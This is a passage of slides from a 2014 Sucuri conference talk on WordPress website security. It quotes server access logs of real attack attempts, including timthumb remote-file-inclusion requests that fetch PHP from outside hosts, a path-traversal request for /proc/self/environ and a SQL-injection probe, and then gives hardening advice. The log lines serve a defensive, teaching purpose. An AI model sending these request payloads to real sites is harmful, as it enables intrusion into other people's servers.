  • 34. [02/Apr/2013:00:32:58 -0400] "GET /results/wp-content/themes/Convertible/timthumb.php?src=http%3A%2F%2Fflickr.easyneffective.com%2Fcrotz.php HTTP/1.1" 200 11983 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0” 83.170.99.221 - - [03/Apr/2013:13:03:16 -0400] "GET /results/chinchedbistro.com&amp;sa=U&amp;ei=vGBcUYS1IcOaiQLxu4HIBg&amp;ved=0CCYQFjAE&amp;usg=AFQjCNFN1APEnX9- WPS337kMyPUz0yDM8A/wp-content/themes/vulcan/lib/scripts/thumb.php?src=http://wordpress.com.4creatus.com/info.php HTTP/1.1" 200 11983 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6” 82.98.131.101 - - [03/Apr/2013:12:59:56 -0400] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ%0000 HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" 5/17/2014 Tony Perez | @perezbox | @sucuri_security 35
  • 35. 5/17/2014 Tony Perez | @perezbox | @sucuri_security 36 62.122.71.181 - - [03/Apr/2013:05:24:22 -0400] "GET //?malware-999.9+union+select+0-- HTTP/1.1" 200 26336 "-" "Mozilla/5.0 (Windows NT;en-us) Firefox/3.5.9”
  • 36. 5/17/2014 Tony Perez | @perezbox | @sucuri_security 37
  • 37. 5/17/2014 Tony Perez | @perezbox | @sucuri_security 38
  • 38.  http://blog.sucuri.net/2014/03/unmasking-free-premium- wordpress-plugins.html 5/17/2014 Tony Perez | @perezbox | @sucuri_security 39 - SEOPresser - Payload located: wp-content/plugins/seo-pressor(gratuit) - File: central.class.php - Flat Skins Pack Extension - Payload located: wp-content/restrict-content-pro/includes/ - File: sidebar.php - Restrict Content Pro - Paylaod located: wp-content/ubermenu-skins-flat
  • 39.  Brand Reputation  Legal Implications  Impact to Sales  Blacklisted by Search Engines  Blacklisted by Payment processors  Worst Day Of your Life 5/17/2014 Tony Perez | @perezbox | @sucuri_security 40
  • 40. 5/17/2014 Tony Perez | @perezbox | @sucuri_security 41
  • 41.  Sucuri properties suffer:  ~125,000 web based attacks a month on average  ~4,000 attacks a day ▪ This spikes on occasion  Doesn’t include server level attacks  All flavors of attacks 5/17/2014 Tony Perez | @perezbox | @sucuri_security 42
  • 42.  Principles  Access Control  Vulnerabilities 5/17/2014 Tony Perez | @perezbox | @sucuri_security 43
  • 43. “It’s about risk reduction… risk will never be zero…” 5/17/2014 Tony Perez | @perezbox | @sucuri_security 44
  • 44. “…a concept in which multiple layers of security controls (defenses) are placed throughout an information technology (IT) system. Its intent is to provide redundancy in the event a security control fails or a vulnerability is exploited…” 5/17/2014 Tony Perez | @perezbox | @sucuri_security 45
  • 45.  Passwords 5/17/2014 Tony Perez | @perezbox | @sucuri_security 46 Complex – Long - Unique
  • 46. 5/17/2014 Tony Perez | @perezbox | @sucuri_security 47
  • 47. 5/17/2014 Tony Perez | @perezbox | @sucuri_security 48
  • 48. 5/17/2014 Tony Perez | @perezbox | @sucuri_security 49 • https://getclef.com/ | @getclef
  • 49. “requires that in a particular abstraction layer of a computing environment, every module (such as a process, a user or a program depending on the subject) must be able to access only the information and resources that are necessary for its legitimate purpose.” 5/17/2014 Tony Perez | @perezbox | @sucuri_security 50
  • 50. 5/17/2014 Tony Perez | @perezbox | @sucuri_security 51  PHP Execution, disable it:  /wp-includes  /wp-content  /themes  /plugins  /uploads <Files *.php> Deny from all </Files>
  • 51.  WP-CONFIG File Modification #Disable Plugin /Theme Editor Define(‘DISALLOW_FILE_EDIT’,true); 5/17/2014 Tony Perez | @perezbox | @sucuri_security 52
  • 52. 5/17/2014 Tony Perez | @perezbox | @sucuri_security 53 • https://www.getcloak.com/ | @getcloak
  • 53. 5/17/2014 Tony Perez | @perezbox | @sucuri_security 54
  • 54. 5/17/2014 Tony Perez | @perezbox | @sucuri_security 55 NOTTHAT HARD!!!!
  • 55.  Stay current with the latest vulnerabilities:  Secure - http://wordpress.org/plugins/secure/ 5/17/2014 Tony Perez | @perezbox | @sucuri_security 56
  • 56.  Local Protection  https://bruteprotect.com/ | @BruteProtect 5/17/2014 Tony Perez | @perezbox | @sucuri_security 57
  • 57. 5/17/2014 Tony Perez | @perezbox | @sucuri_security 58 • Stay ahead of SoftwareVulnerabilities
  • 58. 5/17/2014 Tony Perez | @perezbox | @sucuri_security 59
  • 59. 5/17/2014 Tony Perez | @perezbox | @sucuri_security 60 1. Employ Website Firewall 2. Don’t let WordPress write to itself 3. Filter Access by IP 4. Use a dedicated server / VPS 5. Monitor all Activity (Logging) 6. Enable SSL for transactions 7. Keep environment current (patched) 8. No Soup Kitchen Servers Ideal implementations: 1. Connect Securely – SFTP / SSH 2. Authentication Keys / wp- config 3. Use Trusted Sources 4. Use a local Antivirus – MAC too 5. Permissions - D 755 | F 644 6. Least Privileged Principles 7. Accountability 8. Backups – Include Database The Bare Minimum:
  • 60. 1. Fix index.php file and assume all is fine. 1. Panic your way into WordPress Forums after hack. 1. Don’t worry about updating. 1. Trust third-party extensions. 1. Apply all upgrades on live site. 1. Install and forget, all is well with your new site. 1. Use the same username and password for everything. 1. Don’t waste time making security adjustments to PHP and settings. 1. No regular backups required. 1. Use the cheapest host. 5/17/2014 Tony Perez | @perezbox | @sucuri_security 61
  • 61. 5/17/2014 Tony Perez | @perezbox | @sucuri_security 62 Name Tool Sucuri Blog http://blog.sucuri.net SucuriTV http://sucuri.tv Malware Scanner http://sitecheck.sucuri.net Malware Scanner http://unmaskparasites.com Badware Busters https://badwarebusters.org Google Forums http://productforums.google.com/forum/#!categories/webmasters/malware--hacked- sites GoogleWebmasterTools http://support.google.com/webmasters/bin/answer.py?hl=en&answer=163633 Secunia SecurityAdvisories http://secunia.com/community/advisories/search/?search=wordpress Exploit-DB http://www.exploit- db.com/search/?action=search&filter_description=Wordpress&filter_platform=31 WordPress Hacked FAQ http://codex.wordpress.org/FAQ_My_site_was_hacked WordPress Hardening http://codex.wordpress.org/Hardening_WordPress
  • 62. 5/17/2014 Tony Perez | @perezbox | @sucuri_security 63 Sucuri, Inc. Tony Perez http://sucuri.net http://blog.sucuri.net @perezbox | @sucuri_security Slides: http://www.slideshare.net/perezbox/website-security-its- about-the-basics-wordpress-2014